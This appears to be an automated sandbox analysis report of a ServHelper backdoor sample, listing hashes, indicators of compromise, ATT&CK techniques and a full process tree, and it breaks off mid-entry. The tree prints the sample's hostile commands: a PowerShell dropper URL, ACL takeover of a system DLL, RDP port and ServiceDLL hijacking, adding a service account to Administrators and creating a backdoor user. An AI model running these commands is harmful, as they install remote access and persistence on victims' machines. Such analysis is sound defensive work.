servhelper | aee35491525d86d85dc0f6410525ba82673d7691d4035436154f395430a23594

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
12-03-2024 07:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c2d4bd5b611d2adb39200dc461255d5f.exe
Size

6.9MB
MD5

c2d4bd5b611d2adb39200dc461255d5f
SHA1

d4ee36f705dad290f9beb74da59c9d147d47dc3b
SHA256

aee35491525d86d85dc0f6410525ba82673d7691d4035436154f395430a23594
SHA512

631fe15d69b6591e7538277546f694fe6361ca1d485aab2de4406aa460ffc316f2156e44d08124d24cf43197cf154e983c563efa21078b99e4a2524968514668
SSDEEP

98304:ipb2Sar8+l1PRdU6wjvo8+NcbCOX69G50zPtzKgu0t5tZgPVWp0vHbSxKyxmxFNz:i8SaoIR6xsu/qQm+gp6zvy3xmXRB

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	Process
38	372	powershell.exe
43	372	powershell.exe
57	372	powershell.exe
59	372	powershell.exe
61	372	powershell.exe
63	372	powershell.exe
65	372	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exe

pid	Process
2576	icacls.exe
1708	icacls.exe
4084	icacls.exe
1020	icacls.exe
4684	icacls.exe
3424	icacls.exe
2232	icacls.exe
4764	takeown.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid	Process
4360
4360

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	Process
4764	takeown.exe
2576	icacls.exe
1708	icacls.exe
4084	icacls.exe
1020	icacls.exe
4684	icacls.exe
3424	icacls.exe
2232	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x000e000000023126-101.dat	upx
behavioral2/files/0x000800000002321f-102.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
37	raw.githubusercontent.com
38	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	Process
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI84A1.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI84C2.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI84C3.tmp	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_qhw5ef1x.w5z.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_rjr0eul1.sfi.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI84D4.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI84B2.tmp	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exe

pid	Process
4556	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
4892	reg.exe

Runs net.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc	stream
HTTP User-Agent header	43	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	57	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2036	powershell.exe
2036	powershell.exe
2036	powershell.exe
1868	powershell.exe
1868	powershell.exe
1868	powershell.exe
3636	powershell.exe
3636	powershell.exe
3636	powershell.exe
1156	powershell.exe
1156	powershell.exe
1156	powershell.exe
2036	powershell.exe
2036	powershell.exe
2036	powershell.exe
372	powershell.exe
372	powershell.exe
372	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid	Process
660
660

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

c2d4bd5b611d2adb39200dc461255d5f.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	3028	c2d4bd5b611d2adb39200dc461255d5f.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe
Token: SeDebugPrivilege	3636	powershell.exe
Token: SeDebugPrivilege	1156	powershell.exe
Token: SeRestorePrivilege	1020	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	4556	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4556	WMIC.exe
Token: SeAuditPrivilege	4556	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4556	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4556	WMIC.exe
Token: SeAuditPrivilege	4556	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4240	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4240	WMIC.exe
Token: SeAuditPrivilege	4240	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4240	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4240	WMIC.exe
Token: SeAuditPrivilege	4240	WMIC.exe
Token: SeDebugPrivilege	372	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c2d4bd5b611d2adb39200dc461255d5f.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	Process	procid_target
PID 3028 wrote to memory of 2036	3028	c2d4bd5b611d2adb39200dc461255d5f.exe	94
PID 3028 wrote to memory of 2036	3028	c2d4bd5b611d2adb39200dc461255d5f.exe	94
PID 2036 wrote to memory of 3424	2036	powershell.exe	96
PID 2036 wrote to memory of 3424	2036	powershell.exe	96
PID 3424 wrote to memory of 4924	3424	csc.exe	97
PID 3424 wrote to memory of 4924	3424	csc.exe	97
PID 2036 wrote to memory of 1868	2036	powershell.exe	98
PID 2036 wrote to memory of 1868	2036	powershell.exe	98
PID 2036 wrote to memory of 3636	2036	powershell.exe	103
PID 2036 wrote to memory of 3636	2036	powershell.exe	103
PID 2036 wrote to memory of 1156	2036	powershell.exe	105
PID 2036 wrote to memory of 1156	2036	powershell.exe	105
PID 2036 wrote to memory of 4764	2036	powershell.exe	108
PID 2036 wrote to memory of 4764	2036	powershell.exe	108
PID 2036 wrote to memory of 2576	2036	powershell.exe	109
PID 2036 wrote to memory of 2576	2036	powershell.exe	109
PID 2036 wrote to memory of 1020	2036	powershell.exe	110
PID 2036 wrote to memory of 1020	2036	powershell.exe	110
PID 2036 wrote to memory of 4084	2036	powershell.exe	111
PID 2036 wrote to memory of 4084	2036	powershell.exe	111
PID 2036 wrote to memory of 1708	2036	powershell.exe	112
PID 2036 wrote to memory of 1708	2036	powershell.exe	112
PID 2036 wrote to memory of 4684	2036	powershell.exe	113
PID 2036 wrote to memory of 4684	2036	powershell.exe	113
PID 2036 wrote to memory of 3424	2036	powershell.exe	114
PID 2036 wrote to memory of 3424	2036	powershell.exe	114
PID 2036 wrote to memory of 2232	2036	powershell.exe	115
PID 2036 wrote to memory of 2232	2036	powershell.exe	115
PID 2036 wrote to memory of 2980	2036	powershell.exe	116
PID 2036 wrote to memory of 2980	2036	powershell.exe	116
PID 2036 wrote to memory of 4892	2036	powershell.exe	117
PID 2036 wrote to memory of 4892	2036	powershell.exe	117
PID 2036 wrote to memory of 2468	2036	powershell.exe	118
PID 2036 wrote to memory of 2468	2036	powershell.exe	118
PID 2036 wrote to memory of 4448	2036	powershell.exe	119
PID 2036 wrote to memory of 4448	2036	powershell.exe	119
PID 4448 wrote to memory of 5012	4448	net.exe	120
PID 4448 wrote to memory of 5012	4448	net.exe	120
PID 2036 wrote to memory of 3124	2036	powershell.exe	121
PID 2036 wrote to memory of 3124	2036	powershell.exe	121
PID 3124 wrote to memory of 4996	3124	cmd.exe	122
PID 3124 wrote to memory of 4996	3124	cmd.exe	122
PID 4996 wrote to memory of 2360	4996	cmd.exe	123
PID 4996 wrote to memory of 2360	4996	cmd.exe	123
PID 2360 wrote to memory of 2952	2360	net.exe	124
PID 2360 wrote to memory of 2952	2360	net.exe	124
PID 2036 wrote to memory of 3320	2036	powershell.exe	125
PID 2036 wrote to memory of 3320	2036	powershell.exe	125
PID 3320 wrote to memory of 2452	3320	cmd.exe	126
PID 3320 wrote to memory of 2452	3320	cmd.exe	126
PID 2452 wrote to memory of 2868	2452	cmd.exe	127
PID 2452 wrote to memory of 2868	2452	cmd.exe	127
PID 2868 wrote to memory of 4364	2868	net.exe	128
PID 2868 wrote to memory of 4364	2868	net.exe	128
PID 3192 wrote to memory of 4704	3192	cmd.exe	132
PID 3192 wrote to memory of 4704	3192	cmd.exe	132
PID 4704 wrote to memory of 4132	4704	net.exe	133
PID 4704 wrote to memory of 4132	4704	net.exe	133
PID 1756 wrote to memory of 2932	1756	cmd.exe	136
PID 1756 wrote to memory of 2932	1756	cmd.exe	136
PID 2932 wrote to memory of 4828	2932	net.exe	137
PID 2932 wrote to memory of 4828	2932	net.exe	137
PID 1308 wrote to memory of 1592	1308	cmd.exe	140
PID 1308 wrote to memory of 1592	1308	cmd.exe	140

C:\Users\Admin\AppData\Local\Temp\c2d4bd5b611d2adb39200dc461255d5f.exe
"C:\Users\Admin\AppData\Local\Temp\c2d4bd5b611d2adb39200dc461255d5f.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2036
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i5mt20ft\i5mt20ft.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3424
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4FF5.tmp" "c:\Users\Admin\AppData\Local\Temp\i5mt20ft\CSCAC647BD194504B51A4914C92D4E219AE.TMP"
      4⤵
      PID:4924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1868
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1156
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4764
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2576
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1020
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4084
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1708
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4684
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3424
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2232
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2980
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:4892
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2468
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4448
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:5012
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3124
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4996
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2360
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:2952
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3320
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2452
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2868
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:4364
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1592
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:3196

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3192
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:4132

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc YgLu3sSl /add
1⤵
- Suspicious use of WriteProcessMemory
